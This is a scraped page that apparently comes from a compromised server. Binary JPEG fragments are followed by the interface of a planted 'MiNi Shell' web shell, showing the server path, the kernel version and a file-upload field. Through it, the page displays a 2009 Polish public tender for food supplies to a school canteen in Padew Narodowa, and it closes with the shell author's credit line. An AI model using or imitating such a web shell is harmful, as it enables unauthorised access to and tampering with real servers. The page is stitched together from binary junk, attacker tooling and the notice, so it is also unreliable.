JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090107/7147-N-2009.html

<p class="kh_header"><b>Padew Narodowa: Dostawa artykułów spożywczych dla potrzeb Stołówki Szkolnej przy Publicznym Gimnazjum im. Franciszka Krempy w Padwi Narodowej</b><br>
<b>Numer ogłoszenia: 7147 - 2009; data zamieszczenia: 07.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Publiczne Gimnazjum w Padwi Narodowej , Padew Narodowa 222A, 39-340 Padew Narodowa, woj. podkarpackie, tel. 0-15 8119301, faks 0-15 8119948.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> padewgimnazjum.republika.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych dla potrzeb Stołówki Szkolnej przy Publicznym Gimnazjum im. Franciszka Krempy w Padwi Narodowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.    Przedmiotem zamówienia jest:
Dostawa artykułów spożywczych dla potrzeb Stołówki Szkolnej w Padwi Narodowej
Zadanie nr 1     Dostawa pieczywa dla Stołówki Szkolnej w Padwi Narodowej
Zadanie nr 2     Dostawa mięsa i wędlin dla Stołówki Szkolnej w Padwi Narodowej 
Zadanie nr 3     Dostawa owoców, warzyw i  kiszonek dla Stołówki Szkolnej w Padwi Narodowej
Zadanie nr 4     Dostawa zup, przypraw i dżemów dla Stołówki Szkolnej w Padwi Narodowej
Zadanie nr 5     Dostawa mąki i artykułów mącznych dla Stołówki Szkolnej w Padwi Narodowej
Zadanie nr 6     Dostawa nabiału dla Stołówki Szkolnej w Padwi Narodowej
Zadanie nr 7     Dostawa mrożonek dla Stołówki Szkolnej w Padwi Narodowej
2.     Zakres:
a)    w zakres przedmiotu zamówienia wchodzą dostawy (zestawione poniżej) dla potrzeb Stołówki Szkolnej w Padwi Narodowej.

Zadanie nr 1
Dostawa pieczywa dla Stołówki Szkolnej w Padwi Narodowej

Lp.	Nazwa 	Nazwa JM	Ilość
1	2	3	4
1	Chleb duży (0,95 kg)	szt	2 000
2	Bułki zwykłe (0,08 kg)	szt	4 000
3	Rogale	szt	3 600
4	Bułka tarta	kg	200
5	Bułka drożdżowa	szt	4 800
6	Pączki	szt	1 200

Zadanie nr 2
Dostawa mięsa i wędlin dla Stołówki Szkolnej w Padwi Narodowej

Lp.	Nazwa 	Nazwa JM	Ilość
1	2	3	4
1	Baleron	kg	50
2	Kiełbasa zwyczajna wieprzowa	kg	200
3	Wędzonka	kg	80
4	Kości wieprzowe	kg	400
5	Kawałki kurczaka	kg 	200
6	Schab b/k	kg	630
7	Filet drobiowy	kg	300
8	Karkówka bez kości	kg	300
9	Kiełbasa krakowska sucha	kg	30
10	Pasztet firmowy drobiowy	kg 	23
11	Kości rurkowe	kg	500
12	Kiełbasa tyrolska	kg	20
13	Kiełbasa cytrynowa	kg	18
14	Kiełbasa wiejska	kg	80
15	Polędwica sopocka	kg	70
16	Wędzonka krotoszyńska	kg	20
17	Polędwica drobiowa 	kg	18
18	Mięso rosołowe	kg	100
19	Smalec 250g	szt	250
20	Słonina	kg	70

Zadanie nr 3
Dostawa owoców, warzywa i kiszonek dla Stołówki Szkolnej w Padwi Narodowej

Lp.	Nazwa 	Nazwa JM	Ilość
1	2	3	4
1	Marchew czerwona korzeń	kg	500
2	Pietruszka korzeń	kg	300
3	Seler korzeń	kg	300
4	Por	szt	150
5	Cebula	kg	300
6	Burak ćwikłowy	kg	240
7	Kapusta biała główki 	szt	50
8	Kapusta pekińska 	szt	150
9	Kapusta włoska	szt	50
10	Ogórek świeży 	kg	60
11	Kalafior świeży	szt	20
12	Ogórki kiszone 	10 kg wiadro	10
13	Kapusta kiszona	10 kg wiadro	50
14	Koperek	pęczek	30
15	Pieczarki	kg	130
16	Czosnek	kg	10
17	Jabłka 	kg	100
18	Cytryny	kg	8
19	Fasola -Jasiek	kg	100
20	Fasola mała	kg	20
21	Groch żółty	kg	28
22	Ogórki korniszony, 1,7 l	szt	120


Zadanie nr 4
Dostawa zup, przypraw i dżemów dla Stołówki Szkolnej w Padwi Narodowej

Lp.	                Nazwa	Nazwa JM	Ilość	uwagi
1	                         2	3	4	5
1	Koper suszony 10g	szt	30	
2	Pietruszka suszona 10g	szt	20	
3	Papryka mielona ostra 20g	szt	10	
4	Papryka mielona słodka 20g	szt	10	
5	Musztarda 1000g	szt	5	
6	Majonez 2850g	szt	25	Winiary lub równoważne
7	Kwasek cytrynowy 20g	szt	10	
8	Majeranek 10g	szt	10	
9	Ziele angielskie 250g	szt	6	
10	Przyprawa magii 1l	szt	20		
11	Koncentrat pomidorowy 1l	 	szt	20	Pudliszki lub równoważne
12	Liść laurowy 100g	szt	6	
13	Kminek 10g	szt	10	
14	Jarzynka 2300g	szt	16	Winiary lub równoważne
15	Rosół drobiowy 2200g	szt	5	
16	Sos pieczeniowy 1000g	szt	18	
17	Sos pieczarkowy 1000g	szt	24	
18	Sos boloński 1000g	szt	12	
19	Sos grzybowy staropolski 700g	szt	12	
20	Zupa ogonowa 800g	szt	12	
21	Zupa grochowa 1000g	szt	12	
22	Zupa pieczarkowa 600g	szt	12	
23	Zupa grzybowa 800g		szt	12	
24	Barszcz biały 1000g	szt	18	
25	Żur w proszku 1000g	szt	12	
26	Consomme 1200g	szt	10	
27	Olej uniwersalny 5 l 	szt	15	
28	Cukier kryształ 1kg	kg	360	
29	Herbata w ekspresowa (100 saszetek-op)	32	Tylos, Cejlon lub równoważne
30	Sól	kg	80	
31	Chrzan w słoiku 180g	op	48	
32	Ocet ?  l	szt	20	
33	Ziarenka smaku uniwersalne 2000g	szt	10	Winiary lub równoważne
34	Pieprz czarny mielony 500g	szt	10	
35	Dżem wiśniowy 300g	szt	20	
36	Dżem jagodowy 300g	szt	20	
37	Dżem truskawkowy 300g	szt	20	
38	Krem czekoladowy Nutella 780g	szt	30	

Zadanie nr 5
Dostawa mąki i artykułów mącznych dla Stołówki Szkolnej w Padwi Narodowej

Lp.   	Nazwa	Nazwa JM	Ilość	    uwagi
 1	2	3	      4	           5
 1	Kasza manna	kg	    10	
 2	Kasza jęczmienna	kg	    60	
 3	Ryż biały	kg	    10	
 4	Makaron gwiazdki 500g	 	op	    15	Lubella lub równoważne
 5	Makaron świderki 500g	op	   400	
 6	Makaron muszelka 500g	op	   30	
 7	Makaron nitka 250g	 	op	   250	Czanecki lub równoważne
 8	Mąka pszenna 1000g	op	70	

Zadanie nr 6
Dostawa nabiału dla Stołówki Szkolnej w Padwi Narodowej

Lp.	                      Nazwa	Nazwa JM	Ilość	  uwagi
 1	                       2	          3	     4	                5
 1	Śmietana 18%  400g	op	500	
 2	Masło    200g	op	800	
 3	Margaryna  250g	op	300	
 4	Ser biały	 	kg	60	
 5	Jajka	szt	3 800	
 6	Ser żółty - salami	kg	40	
 7	Ser żółty - edamski 	kg	15	

Zadanie nr 7
Dostawa mrożonek dla Stołówki Szkolnej w Padwi Narodowej

Lp.	                  Nazwa	Nazwa JM	Ilość	 uwagi
 1	                    2                                                                                                                                                          	        3	     4	               5
1	Paluszki rybne	kg	  80	
2	Filety mintaj	kg	  250	
3	Pierogi ruskie 450g	szt	 2 800	SWISS-POL lub równoważne
4	Kalafior mrożony 500g	szt	   12	
5	Mieszanka wielowarzywna 500g	szt	   12	
6	Brukselka 500g	szt	   12	
7	Mintaj kostka w panierce	kg	  135	
8	Fasolka szparagowa 500g	szt	   12	
9	Pyzy ziemniaczane 500g	szt	650	
10	Kopytka 500 g	szt	450.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.10.00-6, 15.11.00.00-2, 15.13.11.30-5, 15.22.00.00-6, 03.20.00.00-3, 03.22.20.00-3, 15.87.00.00-7, 15.87.20.00-1, 15.83.12.00-4, 15.86.41.00-3, 15.89.10.00-0, 15.41.12.00-4, 03.21.13.00-6, 15.61.00.00-7, 15.61.21.00-2, 15.85.11.00-9, 03.14.25.00-3, 15.51.00.00-0, 15.53.00.00-2, 15.43.11.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział oferenci, o których mowa w art. 22 ust. 1, pkt 1-3, nie wykluczeni na podstawie art. 24 ust. 1-2 ustawy o zamówieniach publicznych. Ocena spełniania warunków, o których mowa w w/w artykułach będzie się odbywać na podstawie dostarczonych oświadczeń. Składanie fałszywych informacji i dokumentów będzie podlegało sankcjom prawnym określonym w polskich przepisach prawnych.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> WYMAGANE OŚWIADCZENIA
Każdy wykonawca przystępujący do postępowania zobowiązany jest złożyć oświadczenie:
1.	zgodnie z art.22.ust.1 upzp, że: 
a)	posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b)	posiada niezbędną wiedzę i doświadczenie, a także potencjał techniczny, a także dysponuje osobami zdolnymi do wykonania zamówienia, 
c)	znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
d)	nie podlega wykluczeniu z postępowania o udzielenie zamówienia 
2.	W sprawie przyjęcia postanowień specyfikacji istotnych warunków zamówienia 
 WYMAGANE DOKUMENTY
Od wykonawców ubiegających się o przyznanie zamówienia, wymagane jest, w celu potwierdzenia spełnienia warunków, o których mowa w art. 25 ust.1 upzp, przedstawienie aktualnych, wymienionych w Załączniku Nr 3 dokumentów. Dokumenty te, zgodnie z obowiązującym w tym zakresie Rozporządzeniem Prezesa Rady Ministrów z dnia 16 października 2008 r., (Dz. U. z dnia 22 października 2008 r Nr 188, poz.1155), mogą być przedstawione w formie oryginału albo kserokopii. Dokumenty złożone w formie kserokopii muszą być opatrzone klauzulą -ZA ZGODNOŚĆ Z ORYGINAŁEM- i poświadczone na każdej stronie przez osoby upoważnione do reprezentowania wykonawcy, lub notarialnie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.padewnarodowa.biuletyn.net , www.padewnarodowa.biuletyn.net.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Publiczne Gimnazjum im. Franciszka Krempy w Padwi Narodowej
Padew Narodowa 222 A
39-340 Padew Narodowa
Sekretariat.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.01.2009 godzina 09:00, miejsce: Publiczne Gimnazjum im. Franciszka Krempy w Padwi Narodowej
Padew Narodowa 222 A
39-340 Padew Narodowa
Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa pieczywa dla Stołówki Szkolnej w Padwi Narodowej.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa 	Nazwa JM	Ilość
1	2	3	4
1	Chleb duży (0,95 kg)	szt	2 000
2	Bułki zwykłe (0,08 kg)	szt	4 000
3	Rogale	szt	3 600
4	Bułka tarta	kg	200
5	Bułka drożdżowa	szt	4 800
6	Pączki	szt	1 200.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa mięsa i wędlin dla Stołówki Szkolnej w Padwi Narodowej.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa 	Nazwa JM	Ilość
1	2	3	4
1	Baleron	kg	50
2	Kiełbasa zwyczajna wieprzowa	kg	200
3	Wędzonka	kg	80
4	Kości wieprzowe	kg	400
5	Kawałki kurczaka	kg 	200
6	Schab b/k	kg	630
7	Filet drobiowy	kg	300
8	Karkówka bez kości	kg	300
9	Kiełbasa krakowska sucha	kg	30
10	Pasztet firmowy drobiowy	kg 	23
11	Kości rurkowe	kg	500
12	Kiełbasa tyrolska	kg	20
13	Kiełbasa cytrynowa	kg	18
14	Kiełbasa wiejska	kg	80
15	Polędwica sopocka	kg	70
16	Wędzonka krotoszyńska	kg	20
17	Polędwica drobiowa 	kg	18
18	Mięso rosołowe	kg	100
19	Smalec 250g	szt	250
20	Słonina	kg	70.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.13.11.30-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa owoców, warzywa i kiszonek dla Stołówki Szkolnej w Padwi Narodowej.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa 	Nazwa JM	Ilość
1	2	3	4
1	Marchew czerwona korzeń	kg	500
2	Pietruszka korzeń	kg	300
3	Seler korzeń	kg	300
4	Por	szt	150
5	Cebula	kg	300
6	Burak ćwikłowy	kg	240
7	Kapusta biała główki 	szt	50
8	Kapusta pekińska 	szt	150
9	Kapusta włoska	szt	50
10	Ogórek świeży 	kg	60
11	Kalafior świeży	szt	20
12	Ogórki kiszone 	10 kg wiadro	10
13	Kapusta kiszona	10 kg wiadro	50
14	Koperek	pęczek	30
15	Pieczarki	kg	130
16	Czosnek	kg	10
17	Jabłka 	kg	100
18	Cytryny	kg	8
19	Fasola -Jasiek-	kg	100
20	Fasola mała	kg	20
21	Groch żółty	kg	28
22	Ogórki korniszony, 1,7 l	szt	120.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3, 03.22.20.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa zup, przypraw i dżemów dla Stołówki Szkolnej w Padwi Narodowej.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	                Nazwa	Nazwa JM	Ilość	uwagi
1	                         2	3	4	5
1	Koper suszony 10g	szt	30	
2	Pietruszka suszona 10g	szt	20	
3	Papryka mielona ostra 20g	szt	10	
4	Papryka mielona słodka 20g	szt	10	
5	Musztarda 1000g	szt	5	
6	Majonez 2850g	szt	25	Winiary lub równoważne
7	Kwasek cytrynowy 20g	szt	10	
8	Majeranek 10g	szt	10	
9	Ziele angielskie 250g	szt	6	
10	Przyprawa magii 1l	szt	20		
11	Koncentrat pomidorowy 1l	 	szt	20	Pudliszki lub równoważne
12	Liść laurowy 100g	szt	6	
13	Kminek 10g	szt	10	
14	Jarzynka 2300g	szt	16	Winiary lub równoważne
15	Rosół drobiowy 2200g	szt	5	
16	Sos pieczeniowy 1000g	szt	18	
17	Sos pieczarkowy 1000g	szt	24	
18	Sos boloński 1000g	szt	12	
19	Sos grzybowy staropolski 700g	szt	12	
20	Zupa ogonowa 800g	szt	12	
21	Zupa grochowa 1000g	szt	12	
22	Zupa pieczarkowa 600g	szt	12	
23	Zupa grzybowa 800g		szt	12	
24	Barszcz biały 1000g	szt	18	
25	Żur w proszku 1000g	szt	12	
26	Consomme 1200g	szt	10	
27	Olej uniwersalny 5 l 	szt	15	
28	Cukier kryształ 1kg	kg	360	
29	Herbata w ekspresowa (100 saszetek	op)	32	Tylos, Cejlon lub równoważne
30	Sól	kg	80	
31	Chrzan w słoiku 180g	op	48	
32	Ocet ?  l	szt	20	
33	Ziarenka smaku uniwersalne 2000g	szt	10	Winiary lub równoważne
34	Pieprz czarny mielony 500g	szt	10	
35	Dżem wiśniowy 300g	szt	20	
36	Dżem jagodowy 300g	szt	20	
37	Dżem truskawkowy 300g	szt	20	
38	Krem czekoladowy Nutella 780g	szt	30.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.00.00-7, 15.87.20.00-1, 15.83.12.00-4, 15.86.41.00-3, 15.89.10.00-0, 15.41.12.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa mąki i artykułów mącznych dla Stołówki Szkolnej w Padwi Narodowej.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.   	Nazwa	Nazwa JM	Ilość	    uwagi
 1	2	3	      4	           5
 1	Kasza manna	kg	    10	
 2	Kasza jęczmienna	kg	    60	
 3	Ryż biały	kg	    10	
 4	Makaron gwiazdki 500g	 	op	    15	Lubella lub równoważne
 5	Makaron świderki 500g	op	   400	
 6	Makaron muszelka 500g	op	   30	
 7	Makaron nitka 250g	 	op	   250	Czanecki lub równoważne
 8	Mąka pszenna 1000g	op	70.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.00.00-7, 03.21.13.00-6, 15.61.21.00-2, 15.85.11.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa nabiału dla Stołówki Szkolnej w Padwi Narodowej.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	                      Nazwa	Nazwa JM	Ilość	  uwagi
 1	                       2	          3	     4	                5
 1	Śmietana 18%  400g	op	500	
 2	Masło    200g	op	800	
 3	Margaryna  250g	op	300	
 4	Ser biały	 	kg	60	
 5	Jajka	szt	3 800	
 6	Ser żółty - salami	kg	40	
 7	Ser żółty - edamski 	kg	15.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.51.00.00-0, 03.14.25.00-3, 15.53.00.00-2, 15.43.11.00-9, 15.54.00.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa mrożonek dla Stołówki Szkolnej w Padwi Narodowej.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	                  Nazwa	Nazwa JM	Ilość	 uwagi
 1	                    2                                                                                                                                                          	        3	     4	               5
1	Paluszki rybne	kg	  80	
2	Filety mintaj	kg	  250	
3	Pierogi ruskie 450g	szt	 2 800	SWISS-POL lub równoważne
4	Kalafior mrożony 500g	szt	   12	
5	Mieszanka wielowarzywna 500g	szt	   12	
6	Brukselka 500g	szt	   12	
7	Mintaj kostka w panierce	kg	  135	
8	Fasolka szparagowa 500g	szt	   12	
9	Pyzy ziemniaczane 500g	szt	650	
10	Kopytka 500 g	szt	450.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6, 15.33.11.70-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com